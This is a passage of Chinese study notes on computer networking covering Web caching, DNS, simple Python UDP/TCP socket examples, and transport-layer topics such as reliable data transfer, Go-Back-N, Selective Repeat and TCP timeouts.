缓存</strong></p><ul><li><p>Web缓存也称代理服务器，其工作流程如下：</p><ul><li><p>浏览器创建一个到Web缓存器的TCP连接，并向Web缓存器中的对象发送一个 HTTP 请求。</p></li><li><p>Web缓存器进行检查</p><ul><li><p>如果本地存储了对象副本，则Web缓存器向客户浏览器用HTTP响应报文返回该对象。</p></li><li><p>如果没有存储该对象，则打开一个与该对象的初始服务器的TCP连接，并在该连接上发起一个HTTP请求。受到请求后，初始服务器向该web缓存器发送具有该对象的http响应。</p><p>当Web缓存器接收到对象后，在本地存储空间存储一份副本，并向客户的浏览器用HTTP响应报文发送该副本。</p></li></ul></li></ul></li><li><p>存放在Web缓存器中的对象副本可能是陈旧的，而http协议允许缓存器证实它的对象是最新的，即<strong>条件GET</strong>方法：</p><ul><li>请求报文使用 GET 方法</li><li>请求报文中包含一个 If-Modified-Since 首部行</li></ul><p>如果Web缓存器向初始服务器发送<strong>条件get</strong>报文时：</p><ul><li>目标对象没有发生改变，则响应报文中的body为空。</li><li>目标对象已经改变，响应报文中存放新的对象。</li></ul></li></ul></li></ul><h4 id="b-DNS">b. DNS</h4><ul><li><p>主机的一种标识方式是使用其<strong>主机名hostname</strong>。</p></li><li><p>DNS是</p><ul><li>一个由分层的DNS服务器实现的分布式数据库。</li><li>一个使得主机能够查询分布式数据库的应用层协议。</li></ul></li><li><p>DNS提供的服务</p><ul><li><p><strong>主机名到IP地址的转换</strong></p></li><li><p><strong>主机别名</strong>：有着复杂主机名的主机能够拥有一个或多个别名。</p><p>例如一台名为<code>relay1.west-coast.enterprise.com</code>的主机，可能还有两个别名为<code>enterprise.com</code>和<code>www.enterprise.com</code>的主机。在这种情况下，<code>relay1.west-coast.enterprise.com</code>也称为<strong>规范主机名canonical hostname</strong>。主机别名比主机规范名更加容易记忆。</p></li><li><p><strong>邮件服务器别名</strong>：电子邮件应用程序可以调用DNS，对提供的主机名别名进行解析，以获得该主机的规范主机名及其IP地址。</p></li><li><p><strong>负载分配</strong>：DNS也用在冗余的服务器之间进行负载分配。</p></li></ul></li><li><p>DNS工作机理概述</p><ul><li><p>分布式、层次数据库</p><ul><li>为了处理扩展性问题，DNS使用了大量的DNS服务器，以层次方式组织。</li><li>有三种类型的DNS服务器<ul><li><strong>根DNS服务器</strong>：提供顶级域服务器的ID地址。</li><li><strong>顶级域（Top-Level Domain）DNS服务器</strong>：对于每个顶级域（例如com、org、net等）和所有国家的顶级域（如uk、fr等），都有TLD服务器。TLD服务器提供权威DNS服务器的IP地址。</li><li><strong>权威DNS服务器</strong>：在因特网上具有公共可访问主机的每个机构必须提供公共可访问的DNS记录，这些记录将这些主机的名字映射为IP地址。一个组织机构的权威DNS收藏了这些DNS记录。</li></ul></li></ul><p><img src="/2021/05/cnatda-1/image-20210508203109038.png" alt="image-20210508203109038"></p><ul><li><p>本地DNS服务器：严格来说不属于DNS服务器的层次结构。本地服务器起着代理的作用，将DNS请求转发到DNS服务器层次结构中。</p><p>DNS查询分为两种：<strong>递归查询</strong>和<strong>迭代查询</strong>。</p><ul><li><p>迭代查询</p><p><img src="/2021/05/cnatda-1/image-20210508204520770.png" alt="image-20210508204520770"></p></li><li><p>递归查询</p><p><img src="/2021/05/cnatda-1/image-20210508204559893.png" alt="image-20210508204559893"></p></li></ul></li></ul></li><li><p>DNS缓存</p><ul><li><p>原理：当某DNS服务器接收一个DNS回答时，DNS缓存能将映射缓存在本地存储器中。</p><p>如果在DNS服务器中缓存了一台主机/IP地址对，另一个对相同主机名的查询到达该DNS服务器时，该DNS服务器就能提供所要求的IP地址，即使它不是该主机名的权威服务器。</p></li><li><p>由于主机和主机名与IP地址间的映射并不是永久的，DNS服务器在一段时间后将丢弃缓存的信息。</p></li><li><p>本地DNS服务器也能够缓存TLD服务器的IP地址，因而允许本地DNS绕过查询链中的根DNS服务器。因为缓存的存在，除了少数DNS查询以外，<strong>根服务器</strong>被绕过了。</p></li></ul></li></ul></li><li><p>DNS记录和报文</p><ul><li><p>共同实现DNS分布式数据库的所有DNS服务器存储了<strong>资源记录（Resource Recode, RR）</strong>,其中提供了主机名到IP地址的映射。每个DNS回答报文中包含了一条或多条的资源记录。</p></li><li><p>资源记录是一个包含了下列字段的4元组：<strong>(Name, Value, Type, TTL)</strong></p><p>其中，TTL是该记录的生存时间，决定了<strong>资源记录应当从缓存中删除的时间</strong>。</p><p>Name和Value的值取决于Type：</p><ul><li><p>如果Type = A，则 Name 是主机名， Value 是该主机名对应的IP地址。即一条类型为A的资源记录提供了标准的主机名到IP地址的映射。例如 <strong>(<a href="http://relay1.bar.foo.com">relay1.bar.foo.com</a>, 145.37.93.126, A)</strong></p></li><li><p>如果Type = NS，则 Name 是一个域（例如<code>foo.com</code>），而 Value 是个知道如何获取该域中主机IP地址的权威DNS服务器的主机名。这个记录用于沿着查询链来路由DNS查询。例如 <strong>(<a href="http://foo.com">foo.com</a>, <a href="http://dns.foo.com">dns.foo.com</a>, NS)</strong></p></li><li><p>如果 Type = CNAME，则 Value 是个别名为 Name 的主机对应的规范主机名。该记录能够向查询的主机提供一个主机名对应的规范主机名。例如 <strong>(<a href="http://foo.com">foo.com</a>, <a href="http://relay1.bar.foo.com">relay1.bar.foo.com</a>, CNAME)</strong></p></li><li><p>如果Type = MX，则 Value 是个别名为 Name 的<strong>邮件服务器的规范主机名</strong>。例如 <strong>(<a href="http://foo.com">foo.com</a>, <a href="http://mail.bar.foo.com">mail.bar.foo.com</a>, MX)</strong>。MX记录允许邮件服务器主机名具有简单的别名。</p><blockquote><p>注意：通过MX记录，一个公司的邮件服务器和其他服务器（例如Web服务器）可以使用<strong>相同的别名</strong>。为了获取邮件服务器的规范主机名，DNS客户应该请求一条MX记录；而为了获取其他服务器的规范主机名，应该请求CNAME记录。</p></blockquote></li></ul><p>如果一台DNS服务用于某特定主机名的<strong>权威DNS服务器</strong>，那么该DNS服务器会有一条<strong>包含用于该主机名的类型A记录</strong>。</p><p>如果服务器不是用于某主机名的权威DNS服务器，那么该服务器将<strong>包含一条类型NS记录</strong>，该记录对应于包含主机名的域；同时还将<strong>包括一条类型A记录</strong>，提供<strong>在NS记录的Value字段中的DNS服务器的IP地址</strong>。</p></li><li><p>DNS报文格式如下，只有查询和回答两种报文，并且格式相同：</p><p><img src="/2021/05/cnatda-1/image-20210509000647692.png" alt="image-20210509000647692"></p><ul><li>前12个字节是<strong>首部区域</strong>，其中有几个字段。<ul><li>第一个字段（标识符）是一个16比特的数，用于标识该查询。该标识符会被复制到对查询的回答报文中，以便让客户用它来匹配发送的请求和接收到的回答。</li><li>标志字段中含有若干标志。<ul><li>1比特的 <strong>“查询/回答”</strong> 标志位指出报文是 <strong>查询报文0</strong> 还是 <strong>回答报文1</strong> 。</li><li>当某DNS服务器是所请求名字的权威DNS服务器时，1比特的 <strong>“权威的”</strong> 标志位将会被置在回答报文中。</li><li>如果客户在该DNS服务器没有某记录时，希望它执行<strong>递归</strong>查询，将设置1比特的 <strong>“希望递归”</strong> 标志位。如果该DNS服务器支持递归查询，则在回答报文中会对1比特的 <strong>“递归可用”</strong> 标志位置位。</li></ul></li></ul></li><li><strong>问题区域</strong>包含着正在进行的查询信息。其中，该区域包括<ul><li>名字字段，包含正在被查询的主机名字</li><li>类型字段，指出有关该名字的正被询问的问题类型，例如主机地址是与一个名字相关联（类型A）还是与某个名字的邮件服务器相关联（类型MX）。</li></ul></li><li>在来自DNS服务器的回答中，<strong>回答区域</strong>包含了对最初请求的名字的资源记录。回答报文中的回答区域可以包含多条RR，因此<strong>一个主机名能够有多个IP地址，例如负载均衡</strong>。</li><li><strong>权威区域</strong>包含了其他权威服务器的记录。</li><li><strong>附加区域</strong>包含了其他有帮助的记录。例如对于一个MX请求的回答报文的回答区域包含了一条资源记录，提供了邮件服务器的规范主机名。而附加区域中<strong>包含了一个类型A记录</strong>，提供<strong>用于该邮件服务器的规范主机名的IP地址</strong>。</li></ul></li></ul></li></ul><h3 id="3-套接字编程">3. 套接字编程</h3><h4 id="a-UDP编程">a. UDP编程</h4><p><img src="/2021/05/cnatda-1/image-20210508165739385.png" alt="image-20210508165739385"></p><ul><li><p><code>UDPClient.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverName = <span class="string">&#x27;hostname&#x27;</span></span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span class="line">clientSocket = socket(AF_INET, SOCK_DGRAM)</span><br><span class="line">message = raw_input(<span class="string">&#x27;Input lowercase sentence:&#x27;</span>)</span><br><span class="line">clientSocket.sendto(message.encode(), (serverName, serverPort))</span><br><span class="line">modifiedMessage, serverAddress = clientSocket.recvfrom(<span class="number">2048</span>)</span><br><span class="line"><span class="built_in">print</span>(modifiedMessage.decode())</span><br><span class="line">clientSocket.close()</span><br></pre></td></tr></table></figure></li><li><p><code>UDPServer.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span class="line">serverSocket = socket(AF_INET, SOCK_DGRAM)</span><br><span class="line">serverSocket.bind((<span class="string">&#x27;&#x27;</span>, serverPort))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;The server is ready to receive&quot;</span>)</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    message, clientAddress = serverSocket.recvfrom(<span class="number">2048</span>)</span><br><span class="line">    modifiedMessage = message.decode().upper()</span><br><span class="line">    serverSocket.sendto(modifiedMessage.encode(), clientAddress)</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-TCP编程">b. TCP编程</h4><p><img src="/2021/05/cnatda-1/image-20210508165807956.png" alt="image-20210508165807956"></p><ul><li><p><code>TCPClient.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverName = <span class="string">&#x27;servername&#x27;</span></span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span class="line">clientSocket = socket(AF_INET, SOCK_STREAM)</span><br><span class="line">clientSocket.connect((serverName, serverPort))</span><br><span class="line">sentence = raw_input(<span class="string">&#x27;Input lowercase sentence:&#x27;</span>)</span><br><span class="line">clientSocket.send(sentence.encode())</span><br><span class="line">modifiedSentence = clientSocket.recvfrom(<span class="number">1024</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;From Server: &#x27;</span>, modifiedSentence.decode())</span><br><span class="line">clientSocket.close()</span><br></pre></td></tr></table></figure></li><li><p><code>TCPServer.py</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> socket <span class="keyword">import</span> *</span><br><span class="line">serverPort = <span class="number">12000</span></span><br><span class="line">serverSocket = socket(AF_INET, SOCK_STREAM)</span><br><span class="line">serverSocket.bind((<span class="string">&#x27;&#x27;</span>, serverPort))</span><br><span class="line">serverSocket.listen(<span class="number">1</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;The server is ready to receive&quot;</span>)</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    connectionSocket, addr = serverSocket.accept()</span><br><span class="line">    sentence = connectionSocket.recvfrom(<span class="number">1024</span>).decode()</span><br><span class="line">    capitalizedSentence = sentence.upper()</span><br><span class="line">    connectionSocket.send(capitalizedSentence.encode())</span><br><span class="line">    connectionSocket.close()</span><br></pre></td></tr></table></figure></li></ul><h2 id="第三章：运输层">第三章：运输层</h2><h3 id="1-简述">1. 简述</h3><ul><li><p>运输层协议为运行在不同主机上的应用进程之间提供了<strong>逻辑通信logic communication</strong>功能。从应用程序的角度来看，通过逻辑通信，运行不同进程的主机好像直接相连一样。</p></li><li><p>TCP和UDP是运输层协议中的一种，但运输层协议<strong>不是只有这两种</strong>。</p></li><li><p>将运输层TCP/UDP分组称为<strong>报文段segment</strong>，将网络层分组称为<strong>数据报datagram</strong>。</p></li><li><p>因特网网络层协议中有一个协议为<strong>网际协议IP</strong>，其服务模型是<strong>尽力而为交付服务</strong>，称为<strong>不可靠服务</strong>。每台主机至少有一个网络层地址，即IP地址。</p></li><li><p>将主机间交付扩展到进程间交付被称为<strong>运输层的多路复用与多路分解</strong>。</p><ul><li><p>将运输层报文段中的数据交付到正确的套接字的工作称为<strong>多路分解</strong>。</p></li><li><p>从不同套接字中收集数据块、为每个数据块封装上首部信息，以生成报文段，并最终传递到网络层。这些工作统称为<strong>多路复用</strong>。</p></li><li><p>运输层多路复用要求</p><ul><li>套接字有唯一标识符。</li><li>每个报文段有特殊字段来指示该报文段索要交付到的套接字。通常这些字段包含<strong>源端口号字段</strong>和<strong>目的端口号字段</strong>（还有一些其他字段）。</li></ul></li><li><p>运输层实现分解服务的过程</p><ul><li>当报文到达主机时，运输层检查报文段中的目的端口号，并将其定向到相应的套接字。</li><li>报文段中的数据通过套接字进入其所连接的进程。</li></ul></li><li><p><strong>无连接</strong>的多路复用与多路分解</p><p>一个UDP套接字是由一个<strong>二元组</strong>全面标识，该二元组包含一个<strong>目的IP地址</strong>和一个<strong>目的端口号</strong>。</p><p>因此如果两个UDP报文段有不同的源IP地址/源端口号，但具有相同的目的IP地址和目的端口号，则两个报文段将通过相同的目的套接字被定向到相同的目的进程。</p></li><li><p><strong>面向连接</strong>的多路复用与多路分解</p><p>一个TCP套接字是由一个 <strong>四元组（源IP地址，源端口号，目的IP地址，目的端口号）</strong> 来标识。</p><p>两个具有不同源IP地址或源端口号的到达TCP报文段将被定向到两个不同的套接字。</p></li></ul></li></ul><h3 id="2-无连接运输：UDP">2. 无连接运输：<strong>UDP</strong></h3><ul><li><p>UDP优点</p><ul><li><strong>关于发送什么数据以及何时发送的应用层控制更为精细</strong>。与TCP的拥塞控制机制相反，UDP会<strong>立即</strong>将应用层的数据打包并<strong>立即</strong>传递给网络层。</li><li><strong>无需连接建立</strong>。UDP无需三次握手，不需要任何准备即可进行数据传输，因此不会引入建立连接的时延。</li><li><strong>无连接状态</strong>。TCP需要在端系统中维护连接状态，此连接状态中包括接受和发送缓存、拥塞控制参数以及序号与确认号的参数。而UDP不维护连接状态，因此不跟踪这些参数，就可以支持更多活跃客户。</li><li><strong>分组首部开销小</strong>。每个TCP报文段都有20字节的首部开销，而UDP仅有8字节的开销。</li></ul></li><li><p>UDP报文段结构</p><p><img src="/2021/05/cnatda-1/image-20210508163648687.png" alt="image-20210508163648687"></p></li><li><p>UDP提供差错检测功能：发送方的UDP对报文段中的所有16比特字的<strong>和</strong>进行<strong>反码运算</strong>。求和时遇到的任何溢出都将被回卷。得到的结果被放在UDP报文段中的检验和字段。</p><blockquote><p>回卷：把溢出的最高位1和低16位做加法运算。</p></blockquote><p>这样，接收方将全部的16比特字相加，如果分组没有引入差错，则在接收方处该和将为1111111111111111。如果存在任意一个位置的比特为0，则说明该分组中出现差错。</p></li></ul><h3 id="3-可靠数据传输">3. 可靠数据传输</h3><h4 id="1-构建可靠传输数据协议">1. 构建可靠传输数据协议</h4><ul><li><p><strong>可靠数据传输</strong>为上层实体提供的服务抽象是：数据可以通过一条可靠的信道进行传输。借助于可靠信道，传输数据比特就不会不会受到损坏或丢失，并且所有数据都是按照其发送顺序进行交互。</p><p>实现这种服务抽象是<strong>可靠数据传输协议</strong>的责任，但通常该协议的<strong>下层</strong>协议是<strong>不可靠</strong>的，因此任务较为复杂。</p><blockquote><p>例如：TCP是在不可靠的（IP）端到端网络层之上实现的可靠数据传输协议。</p></blockquote></li><li><p>底层信道在分组的传输或缓存的过程中，可能会产生比特差错。当检测到这类错误时，发送方需要重传对应的分组，并等待接收方发送<strong>肯定确认</strong>或<strong>否定确认</strong>的控制报文。这些控制报文使得接收方可以让发送方知道哪些内容被正确接收，那些内容接收有误并因此需要重复。在计算机网络中，基于这样<strong>重传机制</strong>的<strong>可靠数据传输协议</strong>称为<strong>自动重传请求（Automatic Repeat reQuest, ARQ）</strong>。</p><p>更重要的是，ARQ协议还需要另外三种协议功能来处理存在比特差错的情况：</p><ul><li><strong>差错检测</strong>。需要一种机制以使接收方检测到何时出现了比特差错。这里使用<strong>比特校验技术</strong>（想想UDP校验）。</li><li><strong>接收方反馈</strong>。由于发送方和接收方通常在不同的端系统上运行，因此发送方要了解接收方情况的唯一途径是<strong>让接收方提供明确的反馈信息给发送方</strong>。口述报文中的<strong>肯定确认ACK</strong>和<strong>否定确认NAK</strong>就是这种反馈的例子。</li><li><strong>重传</strong>。接收方收到有差错的分组时，发送方将重传该分组文。</li></ul><p>需要注意的是，接收方返回的 ACK/NAK 报文同样有受损或丢包的风险。当发送方收到含糊的 ACK/NAK 分组时，只需重传分组即可，但这会在信道中引入<strong>冗余分组</strong>。冗余分组的困难点在于，接收方无法<strong>事先</strong>知道接收到的分组是新的还是一次重传。</p><p>解决这个问题的一个简单方法是：在数据分组中添加一新字段，让发送方对其数据分组编号，即将发送数据分组的<strong>序号</strong>放在该字段，之后接收方只需检查序号即可确定收到的分组是否是一次重传。</p></li><li><p>除了比特受损以外，底层信道还会丢包。因此可靠数据传输协议必须处理另外两个问题：<strong>如何检测丢包</strong> &amp; <strong>发送丢包后该做什么</strong>。根据上文，我们可以很容易的给出后一个问题的答案——<strong>重传</strong>。但对于第一个<strong>如何检测丢包</strong>，我们需要进一步的研究一下。</p><p>发送方等待足够长的时间以<strong>确定</strong>分组是否已经丢失。实践中发送方根据特定算法选择一个时间值，以<strong>判定</strong>是否丢包（注意是<strong>判定</strong>不是<strong>确保</strong>）。如果在这个时间内没有收到ACK则重传该分组。</p><blockquote><p>需要注意的是，如果一个分组经历特别大的时延，发送方就可能重新发送该分组，即便原分组和其ACK都没有丢失。而这种情况就引入了<strong>冗余数据分组</strong>。</p></blockquote><p>为了实现基于时间的重传机制，需要一个<strong>倒计时定时器</strong>，在一个给定的时间量过期后，中断发送方，使其重传。</p></li><li><p>最终，实现的可靠传输数据协议的状态机图如下所示：</p><p><img src="/2021/05/cnatda-1/image-20210514200231320.png" alt="image-20210514200231320"></p><p>这里同样有一个图说明运行时可能产生的各类情况:</p><p><img src="/2021/05/cnatda-1/image-20210514200835917.png" alt="image-20210514200835917"></p><p>在<strong>检验和</strong>、<strong>序号</strong>、<strong>定时器</strong>、<strong>肯定和否定确认分组</strong>这些技术中，每种机制都在可靠传输协议的运行中起到了必不可少的作用，至此组合而成一个<strong>可靠传输数据协议</strong>。</p></li></ul><h4 id="2-流水线可靠传输数据协议">2. 流水线可靠传输数据协议</h4><p>上文中所实现的可靠传输数据协议是一个<strong>停等</strong>协议，即只有确保<strong>接收方正常接受当前分组</strong>后，才会继续发送下一个分组。停等协议的性能极其低下，并且其信道利用率也非常的低，故<strong>允许发送方发送多个分组而无需等待确认</strong>是一个必然的选择。</p><p>由于许多从发送方向接收方输送的分组可以被看做是填充到一条流水线中，因此该技术称为<strong>流水线</strong>。流水线技术对可靠数据传输协议带来的影响如下：</p><ul><li>必须增加序号范围。因为每个输送中的分组必须有一个唯一的序号，并且或许有多个在输送中的未确认报文。</li><li>协议中的发送方和接收方两端也许不得不缓存多个分组。发送方至少要缓存那些已发送但没有确认的分组；接收方需要缓存那些已正确接受的分组。</li><li>所需序号范围和对缓冲的要求取决于数据传输协议如何处理丢失、损坏以及延时过大的分组。</li></ul><p>对于流水线的差错恢复有两种基本方法：<strong>回退N步（Go-Back-N, GBN）<strong>和</strong>选择重传（Selective Repeat, SR）</strong>。</p><h5 id="1-回退N步">1) 回退N步</h5><p>回退N步协议允许发送方发送多个分组而不需等待确认，但受限于在流水线中未确认的分组数不能超过某个最大允许数N。以下显示了发送方看到的GBN协议的序号范围：</p><blockquote><p>基序号：最早未确认分组的序号</p><p>下一个序号：最小未使用序号</p><p>N常被称为窗口长度，因此GBN协议称为滑动窗口协议。</p></blockquote><ul><li>$[0, base-1]$：已经发送并被确认的分组</li><li>$[base, nextseqnum-1]$：已经发送但未被确认的分组</li><li>$[nextseqnum, base+N-1]$：用于那些要被立即发送的分组</li><li>$[base+N, \infty)$：暂时不能被使用，直到移动窗口。</li></ul><p><img src="/2021/05/cnatda-1/image-20210514202515628.png" alt="image-20210514202515628"></p><p>GBN的发送方必须响应三种类型的事件：</p><ul><li><strong>上层调用</strong>。当上层调用 rdt_send 时，发送方首先检查发送窗口是否已满，如果未满则产生一个分组并发送。如果窗口已满则隐式指示上层该窗口已满。</li><li><strong>收到一个ACK</strong>。GBN协议中，对序号为n的分组的确认采取<strong>累计确认</strong>方式，表示接收方已正确接收到<strong>序号为n的以前且包括n在内</strong>的所有分组。</li><li><strong>超时事件</strong>。定时器用于恢复数据或确认分组的丢失。如果出现超时，则发送方重传<strong>所有已发送但还未被确认过</strong>的分组。</li></ul><p>GBN的接收方动作较为简单：如果一个序号为n的分组被正确接收到，并且按序，则接收方为n发送一个ACK，并将该分组中的数据部分交付到上层。其他情况下则<strong>丢弃该部分</strong>并为<strong>最近按序接收的分组</strong>重新发送ACK。</p><p>以下是一个运行中的GBN流程图：</p><p><img src="/2021/05/cnatda-1/image-20210514204430755.png" alt="image-20210514204430755"></p><h5 id="2-选择重传">2) 选择重传</h5><p>GBN协议可能会重传许多<strong>本没必要重传的分组</strong>，从而影响性能。SR协议通过让发送方仅重传那些<strong>它怀疑在接收方出错的分组</strong>，从而避免了不必要的重传。这种个别的、按需的重传要求接收方<strong>逐个的确认</strong>正确接收的分组。</p><p>SR协议同样使用窗口长度N来限制流水线中未完成、未被确认的分组数。但与GBN不同的是，发送方已经收到了对窗口中某些分组的ACK。</p><p><img src="/2021/05/cnatda-1/image-20210514205328078.png" alt="image-20210514205328078"></p><p>SR接收方将确认一个正确接收的分组而不管其是否<strong>按序</strong>。失序的分组将被<strong>缓存</strong>直到所有的丢失分组全被收到为止，此时才可以将一批分组按需交付给上层。需要注意的是：接收方会<strong>重新确认</strong>（而不是<strong>忽略</strong>）已收到过的那些<strong>序号小于当前窗口基序号</strong>的分组，因为<strong>发送方和接收方的窗口不总是一致</strong>。</p><p>以下是出现丢包时SR操作的简单例子：</p><p><img src="/2021/05/cnatda-1/image-20210514205526638.png" alt="image-20210514205526638"></p><h4 id="3-可靠数据传输机制及其用途的总结">3. 可靠数据传输机制及其用途的总结</h4><ul><li><strong>检验和</strong>：用于检测在一个传输分组中的比特错误。</li><li><strong>定时器</strong>：用于超时/重传一个分组。</li><li><strong>序号</strong>：用于为从发送方流向接收方的数据分组按顺序进行编号。</li><li><strong>确认</strong>：接收方用于告诉发送方一个分组或一组分组已被正确的接收到了。</li><li><strong>否定确认</strong>：接收方用于告诉发送方某个分组未被正确的接收。</li><li><strong>窗口、流水线</strong>：发送方也许被限制仅发送那些序号落在一个指定范围内的分组。</li></ul><h3 id="4-面向连接的运输：TCP">4. 面向连接的运输：TCP</h3><ul><li><p>TCP被称为是面向连接的，因为在一个应用进程可以开始向另一个应用进程发送数据之前，这两个进程必须先相互发送某些预备报文段，以建立确保数据传输的参数，<strong>这个过程称为握手</strong>。连接的双方都将初始化与TCP连接相关的许多TCP状态变量。</p><blockquote><p>注意：TCP的连接，是一条逻辑连接，共同状态仅保留在两个通信端系统的TCP程序中。中间的网络元素不会维持TCP连接状态，它们看到的只是数据报，而不是连接。</p></blockquote><p>同时TCP还是<strong>全双工、点对点</strong>服务。</p></li><li><p>TCP 可从发送缓存中取出并放入报文段中的数据数量受限于<strong>最大报文段长度（Maximum Segment Size， MSS）</strong>。而MSS通常根据最初确定的由本地发送主机发送的<strong>最大链路层帧长度</strong>（即<strong>最大传输单元Maximum Transmission Unit, MTU</strong>）来设置。设置该MSS要保证<strong>一个TCP报文段加上TCP/IP首部长度</strong>将适合单个链路层帧。</p></li></ul><h4 id="a-TCP报文段结构">a. TCP<strong>报文段结构</strong></h4><p><img src="/2021/05/cnatda-1/image-20210514212456035.png" alt="image-20210514212456035"></p><ul><li><p><strong>源端口号</strong>和<strong>目标端口号</strong>：用于多路复用/分解来自或送到上层应用的数据。</p></li><li><p>32bit的<strong>序号</strong>字段和32bit的<strong>确认号</strong>字段。</p></li><li><p>16bit的<strong>接收窗口</strong>字段：用于流量控制，表示接收方愿意接受的字节数量。</p></li><li><p>4bit的<strong>首部长度</strong>字段：表示以32bit为单位的TCP首部长度。由于TCP选项字段的原因，TCP首部的长度是可变的。（通常情况下，选项字段为空，因此TCP首部的典型长度为20字节）。</p></li><li><p>可选与变长的<strong>选项字段</strong>。</p></li><li><p>6bit的<strong>标志</strong>字段</p><ul><li>ACK: 指示确认字段中的值是有效的。</li><li>RST、SYN、FIN：用于连接与拆除。</li><li>CWR、ECE：明确拥塞通告中使用。</li><li>PSH：表示接收方应该<strong>立即将数据交给上层</strong>。</li><li>URG：表示报文段里存在着被发送端的上层实体置为<strong>紧急</strong>的数据。紧急数据的最后一个字节由16bit的紧急数据指针字段指出。当紧急数据存在并给出指向紧急数据尾指针的时候，TCP必须通知接收端的上层实体。</li></ul><blockquote><p>在实践中，PSH、URG和紧急数据指针并没有使用。</p></blockquote></li></ul><h4 id="b-序号和确认号">b. 序号和确认号</h4><ul><li><p>序号：TCP把数据看成一个<strong>无结构有序</strong>的字节流。序号建立在<strong>传送的字节流</strong>之上，而<strong>不是</strong>建立在传送的报文段的序列之上。因此<strong>一个报文段的序号是该报文段首字节的字节流编号</strong>。</p><p><img src="/2021/05/cnatda-1/image-20210514213733944.png" alt="image-20210514213733944"></p></li><li><p>确认号：TCP是全双工的，因此主机A在向主机B发送数据的同时，也可能会受到来自主机B的数据。从主机B到达的每个报文段中都有一个序号用于从B流向A的数据。<strong>主机A填写进报文段的确认号是主机A期望从主机B受到的下一字节的序号。</strong></p><p>因为TCP只确认该流中至第一个丢失字节为止的字节，因此TCP被称为提供<strong>累计确认</strong>。若TCP收到乱序的报文段时，实践中最常用的做法是<strong>接收方保留失序的字节</strong>，并等待缺少的字节以填补该间隔。</p></li><li><p>一个简单例子如下所示：</p><p><img src="/2021/05/cnatda-1/image-20210514215113475.png" alt="image-20210514215113475"></p></li></ul><h4 id="c-往返时间的估计与超时">c. 往返时间的估计与超时</h4><ul><li><p>TCP使用超时/重传机制来处理报文段的丢失问题。<strong>超时时间间隔长度</strong>必须大于该连接的<strong>往返时间(RTT)</strong>，即从一个报文段发出到它被确认的时间，否则会造成不必要的重传。</p></li><li><p>估计往返时间</p><ul><li><p>报文段的<strong>样本RTT</strong>（这里表示为SampleRTT）就是从某报文被发出到对该报文段的确认被收到之间的时间量。大多数TCP的实现仅在某个时刻做一次SampleRTT测量，而不会为每次发送的报文段测量一个SampleRTT。</p></li><li><p>TCP维持一个 SampleRTT 均值（称为 EstimatedRTT），一旦获得一个新 SampleRTT 时，TCP就会根据下列公式来更新 EstimatedRTT：</p><p>$EstimatedRTT = (1 - \alpha) * EstimatedRTT + \alpha* SampleRTT$</p><blockquote><p>RFC 6298 中给出的 alpha 推荐值为 0.125。</p></blockquote></li><li><p>除了估算 RTT外，测量RTT的变化也是有价值的。RFC6298定义了RTT偏差 DevRTT，用于估算SampleRTT 一般会偏离 EstimatedRTT 的程度：</p><p>$DevRTT = (1 - \beta) * DevRTT + \beta * |SampleRTT - EstimatedRTT|$</p></li></ul></li><li><p>设置和管理重传超时间隔</p><p>在TCP的确定重传超时间隔的方法中，EstimatedRTT 和 DevRTT 考虑到了显示的情况，因此最终的间隔为：$TimeoutInterval = EstimatedRTT + 4 * DevRTT$</p><blockquote><p>推荐初始的TimeoutInterval的值为1s。</p></blockquote></li></ul><h4 id="d-可靠数据传输">d. 可靠数据传输</h4><ul><li><p><strong>实现机制</strong>：该部分中具体实现机制的大部分细节与上文中的<strong>可靠数据传输协议</strong>相同。</p></li><li><p><strong>超时间隔加倍</strong>：每次TCP重传时都会将下一次的超时间隔设为先前值的两倍，而不是由EstimatedRTT和DevRTT推断出的值。</p></li><li><p><strong>快速重传</strong>：</p><ul><li><strong>冗余ACK的生成过程</strong>：当TCP接收方检测到了数据流中的间隔时（该间隔可能是报文段丢失或重新排序造成），它只会对已经接收到的最后一个按序字节数据进行重复确认（即产生一个冗余ACK）。</li><li><strong>验证丢包原因</strong>：由于发送方经常发送大量的报文段，如果一个报文段丢失则很有可能引发大量冗余ACK。如果TCP发送方接收到对相同数据的<strong>3个</strong>冗余ACK，则说明跟在这个已被确认过3次的报文段之后的报文段已经丢失。此时执行<strong>快速重传</strong>，在报文段定时器过期<strong>之前</strong>重传丢失的报文段。</li></ul></li><li><p>TCP差错恢复机制</p><ul><li><p>TCP确认是累计式的，正确接收但失序的报文段是<strong>不会</strong>被接收方<strong>逐个确认</strong>。</p><blockquote><p>注意：不会被逐个确认<strong>不代表</strong>会被丢弃。</p></blockquote></li><li><p>TCP发送方仅需维持<strong>已发送过但未被确